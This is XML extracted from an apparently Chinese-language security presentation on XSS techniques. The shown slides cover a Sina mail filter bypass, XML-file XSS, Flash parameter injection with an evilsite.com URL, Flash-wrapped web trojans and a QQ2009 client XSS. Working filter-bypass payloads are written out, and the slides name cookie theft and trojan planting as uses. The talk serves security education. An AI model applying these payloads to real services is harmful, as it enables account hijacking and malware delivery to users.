            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="480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smtClean="0"/>
              <a:t>Bypass sina mail xss filter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mtClean="0"/>
              <a:t>111&lt;script&gt;alert(/xeye/)&lt;&lt;iframe&gt;&lt;/iframe&gt;/script&gt;222</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>这是典型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>xss filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缺陷</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>过滤了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;iframe&gt;&lt;/iframe&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>单独时并不被过滤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>从而导致过滤后变为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>111&lt;script&gt;alert(/xeye/)&lt;/script&gt;222</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>邮箱的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>从来就是热门研究对象，尤其是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>yahoo/hotmail/gmail:)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攻击维度不单一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Cross Site Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>with CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>with UI Redress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>with Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean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smtClean="0"/>
              <a:t>yahoo mail xss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smtClean="0"/>
              <a:t>邮件正文、附件、第三方媒体元素等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>系统什么情况下能保留住关键词，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>expression,javascript:,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>甚至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>on*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>事件等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>浏览器解析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>bug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>构造绕过模型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>边缘性的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>挖掘</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>半自动化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>，分析工具的利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean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smtClean="0"/>
              <a:t>yahoo mail xss</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="400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4727" y="2285992"/>
            <a:ext cx="7583487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54267" y="2714620"/>
            <a:ext cx="3789435" cy="830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CN" sz="4800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML file XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="480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smtClean="0"/>
              <a:t>XML file XSS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mtClean="0"/>
              <a:t>&lt;script xmlns='http://www.w3.org/1999/xhtml'&gt;alert(/xeye/);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>xml.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>文件仅包含这样的代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ff/opera/chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>下有效</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.lookout.net/2008/01/27/firefox-renders-xmlns-xhtml-in-favor-of-xss/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…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28598" y="2714620"/>
            <a:ext cx="4429418" cy="830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CN" sz="4800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious Flash</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="480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smtClean="0"/>
              <a:t>Flash Parameter Injection  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smtClean="0"/>
              <a:t>通过类似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://xeye.us/fpi.swf?url=http://www.evilsite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的方式，将恶意数据传进</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>脚本中处理执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Cross-Site Flashing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" smtClean="0"/>
              <a:t>if (_root.movieURI == undefined) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" smtClean="0"/>
              <a:t>   _root.movieURI = "http://host/movie.swf";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>loadMovieNum(_root.movieURI, 1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Cross-Site Scripting through Flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" smtClean="0"/>
              <a:t>if (_root.url == undefined) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" smtClean="0"/>
              <a:t>	 _root.url = "http://host/";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" smtClean="0"/>
              <a:t>getURL(_root.url);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>more from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://blog.watchfire.com/FPI.ppt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr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smtClean="0"/>
              <a:t>Flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" smtClean="0"/>
              <a:t>封装网马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smtClean="0"/>
              <a:t>一般网马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>是用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>编码，无论使用何种加密、验证等手段，只要在客户端执行就肯定暴露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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Flash AS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>脚本封装</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>封装的最大优势</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>不是所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>都可以做这样封装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>封装的缺陷</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Flash AS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的扩展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ExternalInterface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>类</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>脚本通讯而达到封装且执行的目的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>more from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://hi.baidu.com/ycosxhack/blog/item/c28fed54d7d0a35fd0090636.html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82766" y="2714620"/>
            <a:ext cx="3918060" cy="830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CN" sz="4800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>QQ2009 XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="480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smtClean="0"/>
              <a:t>QQ2009 XSS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QQ2009</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>客户端的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>昵称修改为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>iframe x=`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>发送一条这样的消息给被攻击者：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>src=`http:\\%62aidu.com`y=。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>当被攻击者查看聊天记录时，触发以上代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>more from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://xeye.us/blog/2009/04/qq-xss-0day/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>QQ2009</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>查找群的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>风险</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl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smtClean="0"/>
              <a:t>QQ2009 XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="400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14612" y="3309960"/>
            <a:ext cx="381000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1357298"/>
            <a:ext cx="6478587" cy="170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>
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>哪里可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Bypass XSS Filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>我们的目标是什么（案例分析）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>能做什么（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Tips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zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>相关资源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>讨论时刻</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean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smtClean="0"/>
              <a:t>QQ2009 XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4" descr="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290" y="2329656"/>
            <a:ext cx="6515100" cy="30670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smtClean="0"/>
              <a:t>QQ2009 XSS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smtClean="0"/>
              <a:t>风险点：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>“群的简介”中写入的脚本，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>多处在线</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>服务中有输出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>没对所有的输出点采取严格的过滤措施</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>脚本的植入就可以完成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>所能完成的事</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>盗取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>钓鱼</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>挂马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>xss virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…</a:t>
            </a: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85984" y="2714620"/>
            <a:ext cx="4942379" cy="830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CN" sz="4800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wmf hijack iframe</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="480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smtClean="0"/>
              <a:t>wmf hijack iframe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即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Windows Media Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>hijack iframe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smtClean="0"/>
              <a:t>wmf hijack iframe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285860"/>
            <a:ext cx="6897687" cy="542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smtClean="0"/>
              <a:t>wmf hijack iframe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smtClean="0"/>
              <a:t>嵌入包含劫持代码的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0"/>
              <a:t>hijack.wma</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="280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0232" y="2281255"/>
            <a:ext cx="5657850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smtClean="0"/>
              <a:t>wmf hijack iframe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smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" smtClean="0"/>
              <a:t>指向的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0">
